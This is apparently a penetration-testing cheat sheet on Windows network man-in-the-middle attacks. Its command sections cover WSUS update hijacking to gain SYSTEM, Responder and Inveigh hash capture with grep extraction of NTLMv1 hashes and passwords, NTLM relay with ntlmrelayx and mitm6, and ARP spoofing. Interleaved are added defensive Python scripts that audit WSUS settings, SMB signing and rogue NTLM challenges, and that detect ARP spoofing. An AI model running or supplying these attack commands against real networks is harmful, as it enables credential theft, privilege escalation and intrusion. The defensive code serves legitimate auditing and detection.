MITM

WSUS HTTP misconfiguration

Requirements
  1. The ability to obtain a MitM position against the vulnerable host
  2. Communication between the victim and the WSUS server goes over plain HTTP

If you already have user access on the victim machine, this gives you SYSTEM privileges.

If the poisoning does not work (different broadcast domains) and you have access to the victim machine, you can try to set a system proxy manually (attacker IP and port 8530). The proxy redirection of port 8530 is still needed.

You can also target other machines, but you then depend on their update check frequency.

Check registry on WSUS client machine

The protocol should be HTTP in the WUServer key. Example of a vulnerable URL: http://wsus-server.local:8530.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"

Check that the computer uses WSUS for updates, and check the automatic update policy.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"

GPO alternative: Group Policy > Windows Components > Windows Update > Specify intranet Microsoft update service location.
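Audit script for the registry check above (an added example, not part of the original cheat sheet): it parses the text that the two REG QUERY commands print and reports a finding only when the client actually uses WSUS and the server URL is http://. The sample REG QUERY output is constructed by hand; the value names WUServer, WUStatusServer and UseWUServer are the real ones under those keys.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of REG QUERY output for a client pointed at an HTTP WSUS server
# (hand-written for this example, not captured from a real host).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://wsus-server.local:8530
    WUStatusServer    REG_SZ    http://wsus-server.local:8530

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
    NoAutoUpdate    REG_DWORD    0x0
    AUOptions    REG_DWORD    0x4
    UseWUServer    REG_DWORD    0x1
"""

# One indented "Name    REG_TYPE    data" line; key paths start at column 0 and do not match.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")


def parse_reg_query(text: str) -> dict:
    """Map each value name to (reg_type, data) across all keys in the output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, reg_type, data = m.groups()
            values[name] = (reg_type, data)
    return values


def reg_dword(values: dict, name: str, default: int = 0) -> int:
    """REG_DWORD data is printed as hex (e.g. 0x1); a missing value yields `default`."""
    if name not in values:
        return default
    return int(values[name][1], 16)


def audit_wsus(values: dict) -> list:
    """Return findings for the HTTP WSUS exposure; an empty list means none."""
    findings = []
    if reg_dword(values, "UseWUServer") != 1:
        # Client updates from Microsoft directly, so the WSUS server URL is not used.
        return findings
    for name in ("WUServer", "WUStatusServer"):
        if name not in values:
            continue
        url = values[name][1]
        scheme = urlsplit(url).scheme.lower()
        if scheme == "http":
            findings.append(
                f"{name} uses plaintext HTTP ({url}); an on-path attacker can serve "
                f"a fake update: change the policy to https:// and trust the WSUS certificate"
            )
        elif scheme != "https":
            findings.append(f"{name} has an unexpected value: {url!r}")
    return findings


if __name__ == "__main__":
    for finding in audit_wsus(parse_reg_query(SAMPLE_REG_OUTPUT)) or ["no findings"]:
        print(finding)
```

Run it against the real output by piping `REG QUERY ... > wu.txt` from the client and feeding the file to parse_reg_query; the fix is the https:// form of the same URL plus a WSUS server certificate the clients trust.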

Tooling install

Install from https://github.com/GoSecure/pywsus.

Activate the venv if one was used during setup.

source ./venv/bin/activate

Start WSUS rogue server

Ensure PsExec64.exe is in the pywsus working directory (the WSUS client only accepts Microsoft-signed binaries).

python3 pywsus.py -H <ATTACKER_IP> -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami > C:\\poc.txt" '

MiTM position

Content of wsus.cap:

set arp.spoof.targets <COMMA_SEPARATED_LIST_OF_TARGETS_IP_OR_MAC>
arp.spoof on
set any.proxy.src_port 8530
set any.proxy.dst_port 8530
set any.proxy.dst_address <ATTACKER_IP>
any.proxy on

Start poisoning.

sudo bettercap -i <IFACE> --caplet wsus.cap

Responder

Set the challenge to 1122334455667788 in /etc/responder/Responder.conf.

The -f option may prevent challenge-response capture.

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3
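The fixed challenge set in Responder.conf above is also what makes a rogue responder easy to spot on the wire: a real server draws a fresh random ServerChallenge for every authentication. The following is an added example, not part of the original cheat sheet: a minimal parser for the NTLMSSP CHALLENGE_MESSAGE (type 2, as carried in SMB session setup or an HTTP WWW-Authenticate: NTLM header) that extracts the 8-byte challenge and flags the static value. The messages it runs on are constructed with the build helper, not captured traffic; the target names are made up.

```python
import os
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2
# The fixed challenge Responder is configured with in Responder.conf above.
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")


def build_challenge_message(server_challenge: bytes, target_name: str = "SERVER") -> bytes:
    """Construct a minimal CHALLENGE_MESSAGE (sample data for the parser, not a real capture)."""
    if len(server_challenge) != 8:
        raise ValueError("ServerChallenge must be exactly 8 bytes")
    name = target_name.encode("utf-16-le")
    fixed_len = 48  # Signature..TargetInfoFields; payload follows (no Version field)
    # NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM | ALWAYS_SIGN | TARGET_TYPE_SERVER
    flags = 0x00000001 | 0x00000004 | 0x00000200 | 0x00008000 | 0x00020000
    msg = NTLMSSP_SIGNATURE
    msg += struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", len(name), len(name), fixed_len)  # TargetNameFields
    msg += struct.pack("<I", flags)                              # NegotiateFlags
    msg += server_challenge                                      # ServerChallenge
    msg += b"\x00" * 8                                           # Reserved
    msg += struct.pack("<HHI", 0, 0, fixed_len + len(name))      # TargetInfoFields (empty)
    msg += name
    return msg


def parse_challenge(msg: bytes) -> dict:
    """Extract flags, ServerChallenge and TargetName; raise ValueError on anything else."""
    if len(msg) < 32 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    if msg_type != CHALLENGE_MESSAGE:
        raise ValueError(f"NTLMSSP message type {msg_type}, expected CHALLENGE_MESSAGE (2)")
    name_len, _name_max, name_off = struct.unpack_from("<HHI", msg, 12)
    flags = struct.unpack_from("<I", msg, 20)[0]
    target = msg[name_off:name_off + name_len].decode("utf-16-le", errors="replace")
    return {"flags": flags, "server_challenge": msg[24:32], "target_name": target}


def is_static_challenge(msg: bytes) -> bool:
    """True when the server used the well-known fixed challenge instead of a random one."""
    return parse_challenge(msg)["server_challenge"] == STATIC_CHALLENGE


if __name__ == "__main__":
    rogue = build_challenge_message(STATIC_CHALLENGE, "ROGUE-SRV")
    legit = build_challenge_message(os.urandom(8), "FILESRV01")
    for label, m in (("rogue", rogue), ("legitimate", legit)):
        info = parse_challenge(m)
        print(label, info["target_name"], info["server_challenge"].hex(), is_static_challenge(m))
```

Because the value in Responder.conf can be changed, a sensor should not only match the constant: any ServerChallenge that repeats across sessions from the same source is the underlying indicator, and the --lm / -F style downgrade in the modes above shows up as the LMCompatibility-related flags in the same message.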

NTLM

NTLM MITM attacks

Sniffer

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Packets can be captured in order to extract the hashes.

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack: https://crack.sh

misc::easyntlmchall

NTLM Relay

SMB signing has to be disabled for this kind of attack. On Windows 10 machines, IPv6 is preferred over IPv4.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
responder -I <interface> -r -d -w
ntlmrelayx.py -tf smbrelay.txt
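The signing precondition above is something the server states itself: the SecurityMode field of its SMB2 NEGOTIATE response carries bit 0x01 (signing enabled) and bit 0x02 (signing required), and only hosts without the required bit can be relayed to. The following is an added example, not part of the original cheat sheet and not the cme check: a parser for that field that classifies a host, useful for auditing which servers still need the signing policy. The NEGOTIATE responses are constructed by the build helper so the code runs offline; on a live host the same bytes are the reply to the first SMB2 NEGOTIATE on TCP/445.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_HEADER_LEN = 64
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Construct a minimal SMB2 NEGOTIATE response (sample data, not a capture)."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ16s",
        SMB2_HEADER_LEN, 0, 0,            # StructureSize, CreditCharge, Status
        SMB2_NEGOTIATE, 1,                # Command, CreditResponse
        0x00000001, 0,                    # Flags (SERVER_TO_REDIR), NextCommand
        0, 0, 0, 0, b"\x00" * 16,         # MessageId, Reserved, TreeId, SessionId, Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0,    # StructureSize, SecurityMode, DialectRevision, ContextCount
        b"\x00" * 16,                     # ServerGuid
        0, 0x800000, 0x800000, 0x800000,  # Capabilities, MaxTransact, MaxRead, MaxWrite
        0, 0,                             # SystemTime, ServerStartTime
        SMB2_HEADER_LEN + 64, 0, 0,       # SecurityBufferOffset, SecurityBufferLength, ContextOffset
    )
    return header + body


def parse_security_mode(response: bytes) -> int:
    """Return the SecurityMode field of an SMB2 NEGOTIATE response."""
    if len(response) < SMB2_HEADER_LEN + 4 or response[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    command = struct.unpack_from("<H", response, 12)[0]
    if command != SMB2_NEGOTIATE:
        raise ValueError(f"SMB2 command {command:#x}, expected NEGOTIATE")
    struct_size, security_mode = struct.unpack_from("<HH", response, SMB2_HEADER_LEN)
    if struct_size != 65:
        raise ValueError("not a NEGOTIATE response body")
    return security_mode


def requires_signing(response: bytes) -> bool:
    """True when the server will refuse unsigned sessions (relay precondition not met)."""
    return bool(parse_security_mode(response) & SIGNING_REQUIRED)


def classify(response: bytes) -> str:
    """Human-readable signing posture of the responding server."""
    mode = parse_security_mode(response)
    if mode & SIGNING_REQUIRED:
        return "signing required"
    if mode & SIGNING_ENABLED:
        return "signing enabled but not required"
    return "signing disabled"


if __name__ == "__main__":
    for mode in (0x03, 0x01, 0x00):
        print(f"SecurityMode {mode:#04x}: {classify(build_negotiate_response(mode))}")
```

Domain controllers require signing by default; member servers and workstations only enable it, so they classify as "enabled but not required" until the "Microsoft network server: Digitally sign communications (always)" policy is applied, which is the fix that removes them from any relay list.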

Add computer and start BloodHound (not tested)

ntlmrelayx.py -t ldaps://<dc_fqdn> --add-computer
python bloodhound.py -d <domain> -u <computer>\$ -p '<password>'

PrivExchange (not tested)

ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>

python privexchange.py -ah <fqdn> <dc_fqdn> -u <user> -d <domain>

IPv6

mitm6 -d <fqdn>
ntlmrelayx.py -wh <webserver_hosting_wpad>:80 -t smb://<target_ip>/ -i

Relay and delegation
- https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv
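Both arpspoof modes above work the same way on the wire: repeated unsolicited ARP replies that bind the gateway's or the target's IP to the attacker's MAC. The following is an added example, not part of the original cheat sheet: a passive monitor that remembers the first MAC seen for each IP (or a pinned one for the gateway) and alerts when a different MAC later claims that IP, or when one MAC starts answering for several IPs. The ARP records are constructed; the addresses 10.0.0.1 (gateway), 10.0.0.20 (workstation) and 10.0.0.5 / aa:bb:cc:dd:ee:ee (spoofing host) are assumed lab values.

```python
from collections import defaultdict

# Constructed (sender IP, sender MAC) pairs read from ARP replies, in arrival order.
# Assumed lab addressing: 10.0.0.1 is the gateway, 10.0.0.20 a workstation,
# 10.0.0.5 / aa:bb:cc:dd:ee:ee the host running arpspoof.
SAMPLE_ARP_REPLIES = [
    ("10.0.0.1", "00:11:22:33:44:01"),   # gateway answers a normal request
    ("10.0.0.20", "00:11:22:33:44:20"),  # workstation answers a normal request
    ("10.0.0.5", "aa:bb:cc:dd:ee:ee"),   # spoofing host's own, legitimate binding
    ("10.0.0.1", "aa:bb:cc:dd:ee:ee"),   # gateway IP now claimed by the spoofing MAC
    ("10.0.0.20", "aa:bb:cc:dd:ee:ee"),  # workstation IP claimed too (two-sided spoof)
    ("10.0.0.1", "aa:bb:cc:dd:ee:ee"),   # arpspoof re-sends periodically: no new alert
]


class ArpMonitor:
    """Remember the first MAC seen per IP and alert on later conflicting claims."""

    def __init__(self, trusted: dict = None):
        # trusted pins known bindings (e.g. the gateway) so the first packet cannot poison us
        self.bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.claims = defaultdict(set)  # mac -> IPs it has answered for
        for ip, mac in self.bindings.items():
            self.claims[mac].add(ip)
        self.reported_conflicts = set()
        self.reported_multi = set()
        self.alerts = []

    def observe(self, sender_ip: str, sender_mac: str) -> list:
        """Feed one ARP reply; return the alerts it raised (also kept in self.alerts)."""
        sender_mac = sender_mac.lower()
        new = []
        known = self.bindings.get(sender_ip)
        if known is None:
            self.bindings[sender_ip] = sender_mac
        elif known != sender_mac and (sender_ip, sender_mac) not in self.reported_conflicts:
            self.reported_conflicts.add((sender_ip, sender_mac))
            new.append(f"{sender_ip} was {known}, now claimed by {sender_mac}")
        self.claims[sender_mac].add(sender_ip)
        if len(self.claims[sender_mac]) > 1 and sender_mac not in self.reported_multi:
            self.reported_multi.add(sender_mac)
            new.append(f"{sender_mac} answers for several IPs: {sorted(self.claims[sender_mac])}")
        self.alerts.extend(new)
        return new


def detect(replies, trusted: dict = None) -> list:
    """Run the monitor over a list of replies and return every alert in order."""
    monitor = ArpMonitor(trusted)
    for ip, mac in replies:
        monitor.observe(ip, mac)
    return monitor.alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_ARP_REPLIES):
        print("ALERT:", alert)
```

Feed it from a mirror port or the host's own ARP traffic (the same tcpdump capture shown above, filtered to ARP replies). Expect false positives from legitimate MAC changes such as router failover, NIC replacement or DHCP address reuse, and from routers or virtualization hosts that genuinely answer for several IPs; pinning the gateway with `trusted` and allow-listing such MACs keeps the conflict alert meaningful.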